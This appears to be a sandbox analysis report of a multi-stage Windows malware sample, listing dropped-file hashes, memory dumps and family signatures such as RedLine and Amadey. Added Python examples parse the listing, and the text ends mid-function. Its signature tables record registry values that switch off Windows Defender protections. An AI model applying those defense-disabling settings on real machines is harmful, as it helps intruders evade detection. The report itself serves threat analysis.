C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 a15ca0ffd3fd38390761e7aec5df7b95
SHA1 047bdd6119673d631af6e78d52cd0162d4eb726f
SHA256 39d5fadd9b0ffc55c22d859ad970842d929b7f8c7c84332e45178533d48e6f6a
SHA512 78630946ac3d84dc75f5a2a7214e570e0fc8ea013adfc0369e18243448ba5b397081da65eabae8d25b45d70056f50df714b21a2d0606dc514c265aa91568f27e

memory/1324-941-0x000007FEF5DF0000-0x000007FEF67DC000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PL78BP4I\hLRJ1GG_y0J[1].ico

MD5 8cddca427dae9b925e73432f8733e05a
SHA1 1999a6f624a25cfd938eef6492d34fdc4f55dedc
SHA256 89676a3fb8639d6531c525e5800ff4cc44d06d27ff5607922d27e390eb5b6e62
SHA512 20fbee2886995c253e762f2bb814ad16890b0989deab4d92394363ef0060b96a634d87c380c7ba1b787a8ab312be968fed9329a729b4e0d64235a09e397db740

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\pucq4vc\imagestore.dat

MD5 9df01b0bbb884be8f609bafbced25963
SHA1 519aeb796906f92b02cb40df7de9ce08297b63dd
SHA256 00775aea33cb0277688bf07bad3f3682ad6e3303c8b4066a28658ca865399a04
SHA512 3d2f1d9ff91d3a8343b8a1c110906e66a037805dab52ddd00b47e4ba93abbb090266dd2c50d2f921e2129557d4fb66548f89b9180c2d06f80097b42eaace3893

memory/1828-958-0x0000000070EA0000-0x000000007158E000-memory.dmp

memory/1828-957-0x0000000000B40000-0x0000000001A6A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 b44f3ea702caf5fba20474d4678e67f6
SHA1 d33da22fcd5674123807aaf01123d49a69901e33
SHA256 6b066c420ab228bf788f1abda2911eefbb89834640e64d8d6b4f14cb963e4eb8
SHA512 ed0dcd43d8bb8bab253daaf069353d1c720aa13217230d643e2c056089d56753aa4df5ee478833f716e248277c2553e81ae9c21f0f1502fdaf5bbac726d2a0c3

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 aa6f521d78f6e9101a1a99f8bfdfbf08
SHA1 81abd59d8275c1a1d35933f76282b411310323be
SHA256 3d5c0be6aafffa6324a44619131ff8994b0b59856dedf444ced072cae1ebc39d
SHA512 43ce4ad2d8295880ca1560c7a14cff89f2dfa70942d7679faae417f58177f63ae436604bbe914bd8fbbaedfb992ab6da4637af907e2b28696be53843d7ed8153

memory/1532-975-0x0000000001130000-0x0000000001646000-memory.dmp

memory/1532-977-0x0000000070EA0000-0x000000007158E000-memory.dmp

memory/2868-979-0x0000000003FB0000-0x00000000043A8000-memory.dmp

memory/2868-982-0x0000000003FB0000-0x00000000043A8000-memory.dmp

memory/2868-985-0x00000000043B0000-0x0000000004C9B000-memory.dmp

memory/2052-984-0x0000000002310000-0x0000000002410000-memory.dmp

memory/2052-983-0x0000000000220000-0x0000000000229000-memory.dmp

memory/1828-986-0x0000000070EA0000-0x000000007158E000-memory.dmp

memory/1748-987-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1748-989-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2868-990-0x0000000000400000-0x000000000266D000-memory.dmp

memory/1748-991-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\9535.exe

MD5 21b738f4b6e53e6d210996fa6ba6cc69
SHA1 3421aceeaa8f9f53169ae8af4f50f0d9d2c03f41
SHA256 3b1af64f9747985b3b79a7ce39c6625b43e562227dc2f96758118b2acb3e5e58
SHA512 f766a972fde598399091a82fc8db8d9edd25a9a5f9e5a0568769632091605eeb47bf3b44b69d37d51c1c7ab8be89cd4fb4846a5f06d719db885a35e049f1eb81

memory/2420-997-0x0000000000230000-0x000000000028A000-memory.dmp

memory/2420-998-0x0000000000400000-0x000000000046F000-memory.dmp

memory/2420-1002-0x0000000070EA0000-0x000000007158E000-memory.dmp

memory/1532-1004-0x00000000005A0000-0x00000000005E0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\9890.exe

MD5 109da216e61cf349221bd2455d2170d4
SHA1 ea6983b8581b8bb57e47c8492783256313c19480
SHA256 a94bec1ee46f4a7e50fbccb77c8604c8c32b78a4879d18f923b5fa5e8e80d400
SHA512 460d710c0ffbe612ce5b07ae74abf360ebcf9e88993f2fc4448f31b96005f76f6902453c023477438b676f62de93e1c3e9ba980836c12dc5fc617728a9346e26

memory/2384-1012-0x0000000000020000-0x000000000003E000-memory.dmp

memory/1532-1014-0x0000000070EA0000-0x000000007158E000-memory.dmp

memory/2868-1017-0x0000000003FB0000-0x00000000043A8000-memory.dmp

memory/1488-1016-0x0000000000DE0000-0x0000000000DFE000-memory.dmp

memory/2384-1019-0x0000000000400000-0x0000000000431000-memory.dmp

memory/1488-1020-0x0000000070EA0000-0x000000007158E000-memory.dmp

memory/2384-1021-0x0000000070EA0000-0x000000007158E000-memory.dmp

memory/2868-1022-0x00000000043B0000-0x0000000004C9B000-memory.dmp

memory/1244-1023-0x0000000002BC0000-0x0000000002BD6000-memory.dmp

memory/2384-1026-0x0000000004750000-0x0000000004790000-memory.dmp

memory/1532-1024-0x00000000004F0000-0x00000000004F1000-memory.dmp

memory/1748-1025-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2868-1030-0x0000000000400000-0x000000000266D000-memory.dmp

memory/2868-1073-0x0000000000400000-0x000000000266D000-memory.dmp

memory/1036-1075-0x000000013FF20000-0x00000001404C1000-memory.dmp

memory/2868-1074-0x0000000000400000-0x000000000266D000-memory.dmp

memory/892-1076-0x0000000004050000-0x0000000004448000-memory.dmp

memory/892-1077-0x0000000004050000-0x0000000004448000-memory.dmp

memory/2420-1078-0x0000000070EA0000-0x000000007158E000-memory.dmp

memory/892-1079-0x0000000000400000-0x000000000266D000-memory.dmp

memory/1532-1080-0x00000000005A0000-0x00000000005E0000-memory.dmp

memory/1488-1081-0x0000000070EA0000-0x000000007158E000-memory.dmp

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll

MD5 a5b509a3fb95cc3c8d89cd39fc2a30fb
SHA1 5aff4266a9c0f2af440f28aa865cebc5ddb9cd5c
SHA256 5f3c80056c7b1104c15d6fee49dac07e665c6ffd0795ad486803641ed619c529
SHA512 3cc58d989c461a04f29acbfe03ed05f970b3b3e97e6819962fc5c853f55bce7f7aba0544a712e3a45ee52ab31943c898f6b3684d755b590e3e961ae5ecd1edb9

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

MD5 e913b0d252d36f7c9b71268df4f634fb
SHA1 5ac70d8793712bcd8ede477071146bbb42d3f018
SHA256 4cf5b584cf79ac523f645807a65bc153fbeaa564c0e1acb4dac9004fc9d038da
SHA512 3ea08f0897c1b7b5859961351eef59840bbf319a6ad7ebe1c9e1b5e2ce25588d7b1a37fd6c5417653521fc73f1f42eb043d0ee6fcd645aa92b8f305d726273b4

memory/2384-1093-0x0000000070EA0000-0x000000007158E000-memory.dmp

memory/892-1099-0x0000000000400000-0x000000000266D000-memory.dmp

memory/2384-1101-0x0000000070EA0000-0x000000007158E000-memory.dmp

memory/1096-1102-0x0000000004070000-0x0000000004468000-memory.dmp

memory/1488-1103-0x0000000000A70000-0x0000000000AB0000-memory.dmp

memory/1096-1104-0x0000000004070000-0x0000000004468000-memory.dmp

memory/1096-1105-0x0000000000400000-0x000000000266D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpD918.tmp

MD5 02d2c46697e3714e49f46b680b9a6b83
SHA1 84f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA512 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

C:\Users\Admin\AppData\Local\Temp\tmpD93E.tmp

MD5 f53b7e590a4c6068513b2b42ceaf6292
SHA1 7d48901a22cd17519884cef703088b16eb8ab04f
SHA256 1ba7ecb5cecec10e4cc16b2e5668ba5ea4f52307f5543aba78e83de61e9fb3bf
SHA512 db510c474e4736ae8d23ee020bc029966f8ff2a9146dfc6a79604b05c4d95a4ce7a3d91a26c7d056e925012d62f459744db1d6df91e65c3da77ef6a1ab0ee231

memory/1532-1185-0x0000000000510000-0x000000000052C000-memory.dmp

memory/1532-1186-0x0000000000510000-0x0000000000525000-memory.dmp

memory/1532-1187-0x0000000000510000-0x0000000000525000-memory.dmp

memory/1532-1189-0x0000000000510000-0x0000000000525000-memory.dmp

memory/1532-1192-0x0000000000510000-0x0000000000525000-memory.dmp

memory/1488-1191-0x0000000070EA0000-0x000000007158E000-memory.dmp

memory/1532-1196-0x0000000000510000-0x0000000000525000-memory.dmp

memory/1532-1194-0x0000000000510000-0x0000000000525000-memory.dmp

memory/1532-1198-0x0000000000510000-0x0000000000525000-memory.dmp

memory/1532-1202-0x0000000000510000-0x0000000000525000-memory.dmp

memory/1532-1200-0x0000000000510000-0x0000000000525000-memory.dmp

memory/1532-1204-0x0000000000510000-0x0000000000525000-memory.dmp

memory/1532-1210-0x0000000000510000-0x0000000000525000-memory.dmp

memory/1532-1211-0x0000000000590000-0x0000000000591000-memory.dmp

memory/1532-1208-0x0000000000510000-0x0000000000525000-memory.dmp

memory/1532-1206-0x0000000000510000-0x0000000000525000-memory.dmp

memory/2220-1212-0x0000000000400000-0x000000000047F000-memory.dmp

memory/2220-1218-0x0000000000400000-0x000000000047F000-memory.dmp

memory/2220-1227-0x0000000000400000-0x000000000047F000-memory.dmp

memory/2220-1229-0x0000000000400000-0x000000000047F000-memory.dmp

memory/1532-1240-0x0000000070EA0000-0x000000007158E000-memory.dmp

memory/2220-1245-0x0000000000400000-0x000000000047F000-memory.dmp

memory/2924-1246-0x0000000140000000-0x00000001405E8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 1afff8d5352aecef2ecd47ffa02d7f7d
SHA1 8b115b84efdb3a1b87f750d35822b2609e665bef
SHA256 c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1
SHA512 e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

memory/2924-1256-0x0000000140000000-0x00000001405E8000-memory.dmp

memory/1096-1257-0x0000000000400000-0x000000000266D000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R1YQ38W2\suggestions[1].en-US

MD5 5a34cb996293fde2cb7a4ac89587393a
SHA1 3c96c993500690d1a77873cd62bc639b3a10653f
SHA256 c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512 e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

memory/2168-1301-0x000000001B1B0000-0x000000001B492000-memory.dmp

memory/2168-1302-0x0000000001F80000-0x0000000001F88000-memory.dmp

memory/2168-1304-0x0000000002440000-0x00000000024C0000-memory.dmp

memory/2168-1303-0x000007FEF5590000-0x000007FEF5F2D000-memory.dmp

memory/2168-1305-0x0000000002440000-0x00000000024C0000-memory.dmp

memory/2168-1306-0x000007FEF5590000-0x000007FEF5F2D000-memory.dmp

memory/2168-1307-0x0000000002440000-0x00000000024C0000-memory.dmp

memory/2220-1308-0x0000000000400000-0x000000000047F000-memory.dmp

memory/2168-1309-0x0000000002440000-0x00000000024C0000-memory.dmp

memory/2168-1310-0x000007FEF5590000-0x000007FEF5F2D000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CFY4ONSWON1SGR3MJKR0.temp

MD5 ff2add9158eb19095666d0b75ad4f3bc
SHA1 3df454abc23595a67bbf45efb5c87bf3c4dd75b0
SHA256 25fc41e0e692c805ccbc679e8bd0db1a36a07535bc420838a8c4b0d8c5624df7
SHA512 4e25fcc360bd12134b2a1b66668ff8a7c6aa1bd9b22d8dfe5a0c243564dcb8e787741a7f80cb9392b69347bf40ecc535cb7cf7808da8e65ef3034460bbdeeeb0

memory/2044-1316-0x000000001B2F0000-0x000000001B5D2000-memory.dmp

memory/2044-1317-0x0000000001F10000-0x0000000001F18000-memory.dmp

memory/2044-1318-0x000007FEF4BF0000-0x000007FEF558D000-memory.dmp

memory/2044-1319-0x0000000002870000-0x00000000028F0000-memory.dmp

memory/2044-1320-0x000007FEF4BF0000-0x000007FEF558D000-memory.dmp

memory/2044-1321-0x0000000002870000-0x00000000028F0000-memory.dmp

C:\Program Files\Google\Chrome\updater.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2
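
The dropped-file and memory-dump entries above become useful once they are turned into a hash set and grouped by process. The Python below is an added example, not part of the sandbox report or its tooling: it parses a constructed excerpt copied from the list above (MD5 and SHA256 lines only, for width). It treats a path printed without a drive letter (`\Users\...`) as the same file as its `C:\Users\...` twin, and reads the middle number of a `memory/<pid>-<index>-<start>-<end>` dump name as the report's event index; both are assumptions about the report format. The function names are hypothetical helpers.

```python
"""Added example (not part of the sandbox report): turn dropped-file and
memory-dump entries into a hunting hash set and group regions by process.
SAMPLE is a constructed excerpt of the file list; the drive-less path and the
meaning of the dump-name index are assumptions about the report format.
"""
import re
from collections import defaultdict

SAMPLE = r"""
C:\Users\Admin\AppData\Local\Temp\ECA3.exe

MD5 58258360f94c5c1e36eddf3359a7283a
SHA256 416b5ac6485817378c5c2fff994c6d76a2df9578a5bbbc21f56780acdad9e901

memory/1324-168-0x00000000013B0000-0x00000000013BA000-memory.dmp

\Users\Admin\AppData\Local\Temp\ECA3.exe

MD5 58258360f94c5c1e36eddf3359a7283a
SHA256 416b5ac6485817378c5c2fff994c6d76a2df9578a5bbbc21f56780acdad9e901

C:\Users\Admin\AppData\Local\Temp\F195.exe

MD5 78e5bc5b95cf1717fc889f1871f5daf6
SHA256 7d2e2e4f369bcdbbe4a1d9acd299e230adc522d46e54f59e321622d80da02966

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 78e5bc5b95cf1717fc889f1871f5daf6
SHA256 7d2e2e4f369bcdbbe4a1d9acd299e230adc522d46e54f59e321622d80da02966

memory/1828-958-0x0000000070EA0000-0x000000007158E000-memory.dmp
memory/1532-977-0x0000000070EA0000-0x000000007158E000-memory.dmp
memory/2868-979-0x0000000003FB0000-0x00000000043A8000-memory.dmp
"""

PATH_RE = re.compile(r"^(?:[A-Za-z]:)?\\.+$")  # C:\... or drive-less \Users\...
HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512) ([0-9a-fA-F]+)$")
DUMP_RE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")


def parse_report(text):
    """Return (files, dumps): files as {path, hashes}, dumps as {pid, index, start, end}."""
    files, dumps, current = [], [], None
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = DUMP_RE.match(line)
        if m:
            pid, index, start, end = m.groups()
            dumps.append({"pid": int(pid), "index": int(index),
                          "start": int(start, 16), "end": int(end, 16)})
            current = None
            continue
        m = HASH_RE.match(line)
        if m and current is not None:
            current["hashes"][m.group(1)] = m.group(2).lower()  # hash lines follow their path
            continue
        if PATH_RE.match(line):
            current = {"path": line, "hashes": {}}
            files.append(current)
    return files, dumps


def normalize_path(path):
    # Assumption: '\Users\...' and 'C:\Users\...' name the same file; NTFS is case-insensitive.
    return re.sub(r"^[A-Za-z]:", "", path).lower()


def paths_by_sha256(files):
    """One entry per distinct payload, with every path it was written to."""
    seen = defaultdict(set)
    for f in files:
        sha = f["hashes"].get("SHA256")
        if sha:
            seen[sha].add(normalize_path(f["path"]))
    return {sha: sorted(paths) for sha, paths in seen.items()}


def shared_regions(dumps):
    """Regions with identical bounds dumped from more than one process."""
    seen = defaultdict(set)
    for d in dumps:
        seen[(d["start"], d["end"])].add(d["pid"])
    return {region: sorted(pids) for region, pids in seen.items() if len(pids) > 1}


def region_size(dump):
    return dump["end"] - dump["start"]


if __name__ == "__main__":
    files, dumps = parse_report(SAMPLE)
    for sha, paths in paths_by_sha256(files).items():
        print(sha, "->", ", ".join(paths))  # the hunting list: one line per payload
    for (start, end), pids in shared_regions(dumps).items():
        print(f"0x{start:X}-0x{end:X} ({end - start:#x} bytes) dumped from PIDs {pids}")
```

Run as-is it prints two payload hashes (ECA3.exe, and F195.exe together with its copy under fefffe8cea\explothe.exe, which carry identical hashes in the list above) and one shared region. In the full list the region 0x70EA0000-0x7158E000 is dumped from five processes (1828, 1532, 2420, 1488 and 2384); identical bounds across unrelated PIDs usually mean the same image mapped at its preferred base rather than injected code, which is worth confirming from the dump headers before it goes into a report.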

Analysis: behavioral2

Detonation Overview

Submitted

2023-10-10 20:26

Reported

2023-10-10 20:37

Platform

win10v2004-20230915-en

Max time kernel

67s

Max time network

158s

Command Line

"C:\Users\Admin\AppData\Local\Temp\file.exe"

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\file.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Detect Mystic stealer payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Healer

dropper healer

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\15C9.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\15C9.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\15C9.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\15C9.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\15C9.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\15C9.exe N/A

Mystic

stealer mystic

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\12E9.bat N/A
Key value queried \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1983.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\6013.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5499453.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c2929078.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1102.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\122C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ZI4xM2Zd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\12E9.bat N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pG3rS0fl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Hf8Mh2Uh.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Lq5hq4TW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1480.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1WK02es6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\15C9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1983.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2NB190Af.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6013.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\source1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\75BF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79A8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7B00.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\15C9.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Lq5hq4TW.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\1102.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ZI4xM2Zd.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pG3rS0fl.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Hf8Mh2Uh.exe N/A
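
Two of the registry tables above deserve a closer reading: the `Set value (int)` rows under `Policies\Microsoft\Windows Defender\Real-Time Protection` and the `Windows Defender\Features\TamperProtection = "0"` row written by `15C9.exe` (listed under "Modifies Windows Defender Real-time Protection settings" and "Windows security modification"), and the `RunOnce\wextract_cleanupN` rows listed under "Adds Run key to start application". The latter are not a startup entry for the malware: `wextract.exe`, the Win32 cabinet self-extractor behind IExpress packages, unpacks into `%TEMP%\IXPnnn.TMP` and registers exactly this value so that `advpack.dll,DelNodeRunDLL32` deletes the directory at next logon. Read together, the rows show that `file.exe` created `IXP000.TMP`, an executable inside it created `IXP001.TMP`, and so on, i.e. the sample is a nest of self-extracting packages. The Python below is an added example, not report tooling; it parses a constructed excerpt of those rows, flags the Defender policy writes and rebuilds the extraction chain. Function names are hypothetical helpers.

```python
"""Added example (not part of the sandbox report): read the 'Set value' rows
of the signature tables, flag Defender policy tampering and rebuild the
wextract (IExpress self-extractor) chain behind the IXPnnn.TMP directories.
SAMPLE_ROWS is a constructed excerpt copied from the tables; the function
names are hypothetical helpers, not a sandbox API.
"""
import re

SAMPLE_ROWS = r"""
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\15C9.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\15C9.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\15C9.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pG3rS0fl.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\15C9.exe N/A
"""

# The report's flattened row layout: Description (type) key = "value" process target
ROW_RE = re.compile(r'^Set value \((\w+)\) (.+?) = "(.*)" (.+?) N/A$')


def parse_set_value_rows(text):
    """Keep only 'Set value' rows; 'Key created' and similar rows are skipped."""
    rows = []
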